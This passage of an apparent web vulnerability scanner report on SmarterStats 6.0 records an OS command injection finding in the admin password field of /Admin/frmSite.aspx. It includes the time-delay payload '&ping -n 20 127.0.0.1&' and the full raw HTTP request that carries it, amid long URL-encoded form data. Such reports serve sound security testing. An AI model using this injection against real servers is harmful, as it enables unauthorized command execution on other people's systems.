ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState value omitted; unreadable in the captured copy]&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:51:26 GMT
Content-Length: 0


1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24txtAdminNewPassword_SettingText parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify that the vulnerability exists.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24txtAdminNewPassword_SettingText parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSetting
s%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZ
g8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY2EnKEdNVCswMjowMCkgQXRoZW5zLCBCdWNoYXJlc3QsIElzdGFuYnVsEihHTVQrMDI6MDApIEJlaXJ1dBEoR01UKzAyOjAwKSBBbW1hbhUoR01UK
zAyOjAwKSBKZXJ1c2FsZW0UKEdNVCswMjowMCkgV2luZGhvZWs5KEdNVCswMjowMCkgSGVsc2lua2ksIEt5aXYsIFJpZ2EsIFNvZmlhLCBUYWxsaW5uLCBWaWxuaXVzHChHTVQrMDI6MDApIEhhcmFyZSwgUHJldG9yaWERKEdNVCswMjowMCkgTWluc2sRKEdNVCswMjowMCkgQ2Fpcm8TKEdNVCswMzowMCkgTmFpcm9iaS0oR01UKzAzOjAwKSBNb3Njb3csIFN0LiBQZXRlcnNidXJnLCBWb2xnb2dyYWQaKEdNVCswMzowMCkgS3V3YWl0LCBSaXlhZGgTKEdNVCswMzowMCkgQmFnaGRhZBMoR01UKzAzOjAwKSBUYmlsaXNpEihHTVQrMDM6MzApIFRlaHJhbh0oR01UKzA0OjAwKSBBYnUgRGhhYmksIE11c2NhdCIoR01UKzA0OjAwKSBDYXVjYXN1cyBTdGFuZGFyZCBUaW1lEChHTVQrMDQ6MDApIEJha3UTKEdNVCswNDowMCkgWWVyZXZhbhEoR01UKzA0OjMwKSBLYWJ1bBgoR01UKzA1OjAwKSBFa2F0ZXJpbmJ1cmcoKEdNVCswNTowMCkgSXNsYW1hYmFkLCBLYXJhY2hpLCBUYXNoa2VudB8oR01UKzA1OjMwKSBTcmkgSmF5YXdhcmRlbmVwdXJhLyhHTVQrMDU6MzApIENoZW5uYWksIEtvbGthdGEsIE11bWJhaSwgTmV3IERlbGhpFShHTVQrMDU6NDUpIEthdGhtYW5kdR8oR01UKzA2OjAwKSBBbG1hdHksIE5vdm9zaWJpcnNrGShHTVQrMDY6MDApIEFzdGFuYSwgRGhha2EcKEdNVCswNjozMCkgWWFuZ29uIChSYW5nb29uKRcoR01UKzA3OjAwKSBLcmFzbm95YXJzayMoR01UKzA3OjAwKSBCYW5na29rLCBIYW5vaSwgSmFrYXJ0YREoR01UKzA4OjAwKSBQZXJ0aDEoR01UKzA4OjAwKSBCZWlqaW5nLCBDaG9uZ3FpbmcsIEhvbmcgS29uZywgVXJ1bXFpIShHTVQrMDg6MDApIElya3V0c2ssIFVsYWFuIEJhdGFhchIoR01UKzA4OjAwKSBUYWlwZWkjKEdNVCswODowMCkgS3VhbGEgTHVtcHVyLCBTaW5nY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ApJUGxhbmV0Q0xGA0NMRhQrAwdnZ2dnZ2dnZGQCAg9kFgICAQ9kFgJmDxBkEBUlDE5ldmVyIERlbGV0ZRVEZWxldGUgYWZ0ZXIgMSBtb250aHMVRGVsZXRlIGFmdGVyIDIgbW9udGhzFURlbGV0ZSBhZnRlciAzIG1vbnRocxVEZWxldGUgYWZ0ZXIgNCBtb250aHMVRGVsZXRlIGFmdGVyIDUgbW9udGhzFURlbGV0ZSBhZnRlciA2IG1vbnRocxVEZWxldGUgYWZ0ZXIgNyBtb250aHMVRGVsZXRlIGFmdGVyIDggbW9udGhzFURlbGV0ZSBhZnRlciA5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTAgbW9udGhzFkRlbGV0ZSBhZnRlciAxMSBtb250aHMWRGVsZXRlIGFmdGVyIDEyIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTMgbW9udGhzFkRlbGV0ZSBhZnRlciAxNCBtb250aHMWRGVsZXRlIGFmdGVyIDE1IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTYgbW9udGhzFkRlbGV0ZSBhZnRlciAxNyBtb250aHMWRGVsZXRlIGFmdGVyIDE4IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTkgbW9udGhzFkRlbGV0ZSBhZnRlciAyMCBtb250aHMWRGVsZXRlIGFmdGVyIDIxIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjIgbW9udGhzFkRlbGV0ZSBhZnRlciAyMyBtb250aHMWRGVsZXRlIGFmdGVyIDI0IG1vb
nRocxZEZWxldGUgYWZ0ZXIgMjUgbW9udGhzFkRlbGV0ZSBhZnRlciAyNiBtb250aHMWRGVsZXRlIGFmdGVyIDI3IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjggbW9udGhzFkRlbGV0ZSBhZnRlciAyOSBtb250aHMWRGVsZXRlIGFmdGVyIDMwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzEgbW9udGhzFkRlbGV0ZSBhZnRlciAzMiBtb250aHMWRGVsZXRlIGFmdGVyIDMzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzQgbW9udGhzFkRlbGV0ZSBhZnRlciAzNSBtb250aHMWRGVsZXRlIGFmdGVyIDM2IG1vbnRocxUlATABMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzICMzMCMzQCMzUCMzYUKwMlZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYEZg8PFgYfBgUMSW5kZW50IEZpeGVkHwQFEEV4cG9ydCBEaXJlY3RvcnkfBwICZGQCAQ8PFgQfBgUIIFNldHRpbmcfBwICZGQCBA9kFgICAQ9kFgICAg8PFgIfBGVkZAIFD2QWAgIBD2QWAmYPEA8WAh8EBUFFbmFibGUgcmVtb3ZhbCBvZiBVUkwgaXRlbXMgYWZ0ZXIgc2VtaWNvbG9uICh1c2VkIGZvciBqc2Vzc2lvbmlkKWRkZGQCBg9kFgJmDw8WBB8GBQ5JbmRlbnQgU2V0dGluZx8HAgJkFgICAw8PFgIfBAUwaW5kZXguaHRtDQppbmRleC5odG1sDQpkZWZhdWx0LmFzcA0KZGVmYXVsdC5hc3B4ZGQCCA9kFgICAQ8WAh8CaBYCAgEPZBYGZg9kFgRmDw8WBh8GBQxJbmRlbnQgRml4ZWQfBAUGU2VydmVyHwcCAmRkAgEPDxYEHwYFCCBTZXR0aW5nHwcCAmQWAgIBDw8WAh8EBQdUZXN0Li4uZGQCBA9kFgRmDw8WBh8GBQxJbmRlbnQgRml4ZWQfBAUJRGlyZWN0b3J5HwcCAmRkAgEPDxYEHwYFCCBTZXR0aW5nHwcCAmRkAgYPZBYCAgEPZBYCZg8QZBAVCwpFdmVyeSBob3VyDUV2ZXJ5IDIgaG91cnMNRXZlcnkgMyBob3Vycw1FdmVyeSA0IGhvdXJzDUV2ZXJ5IDUgaG91cnMNRXZlcnkgNiBob3Vycw5FdmVyeSAxMiBob3VycwlFdmVyeSBkYXkMRXZlcnkgMiBkYXlzDEV2ZXJ5IDMgZGF5cwpFdmVyeSB3ZWVrFQsBMQEyATMBNAE1ATYCMTICMjQCNDgCNzIDMTY4FCsDC2dnZ2dnZ2dnZ2dnFgFmZAIKD2QWBAIBD2QWAmYPZBYGZg9kFgICAQ9kFgICAg8PFgIfBAUBNWRkAgEPZBYCAgEPZBYCAgIPDxYCHwQFATVkZAICD2QWAgIBD2QWAgICDw8WAh8EBQMxMDBkZAIDD2QWAmYPZBYCZg9kFgICAQ9kFgJmDxAPFgoeDURhdGFUZXh0RmllbGQFBG5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJpZB4LXyFEYXRhQm91bmRnHwYFDENoZWNrYm94TGlzdB8HAgJkEBUWBkdvb2dsZQVZYWhvbwNBc2sEQmluZwtHb29nbGUgKEFVKQtHb29nbGUgKEJSKQtHb29nbGUgKENBKQtHb29nbGUgKENOKQtHb29nbGUgKERFKQtHb29nbGUgKEVTKQtHb29nbGUgKEZSKQtHb29nbGUgKEhLKQtHb29nbGUgKElOKQtHb29nbGUgKElMKQtHb29nbGUgKElUKQtHb29nbGUgKEpQKQtHb29nbGUgKEtSKQtHb29nbGUgKE1YKQtHb29nbGUgK
E5MKQtHb29nbGUgKFRXKQtHb29nbGUgKFJVKQtHb29nbGUgKFVLKRUWATEBMgE0ATUBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjQCMjMUKwMWZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkGA0FEmN0bDAwJE5hdlBIJHBnckxvZw8FImN0bDAwX01QSF9ncmRMb2dTdGF0dXN8MTZ8MHw5fDI1fDBkBRZjdGwwMCRNUEgkZ3JkTG9nU3RhdHVzDwU1VHJ1ZXxUcnVlfHxUcnVlfFRydWV8TGFzdFRpbWVTdGFtcCBkZXNjfEZhbHNlfEZhbHNlfDBkBRljdGwwMCRNUEgkZ3JkTG9nTG9jYXRpb25zDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTMPMuALAAEAAAD%2F%2F%2F%2F%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%2FP%2F%2F%2F%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2Bv%2F%2F%2F%2Fz%2F%2F%2F8GBwAAAARUZXh0CgH4%2F%2F%2F%2F%2FP%2F%2F%2FwYJAAAAClJlc291cmNlSUQGCgAAAA1ATG9nTG9jYXRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAAPTG9nTG9jYXRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW04DzLaCwABAAAA%2F%2F%2F%2F%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%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuM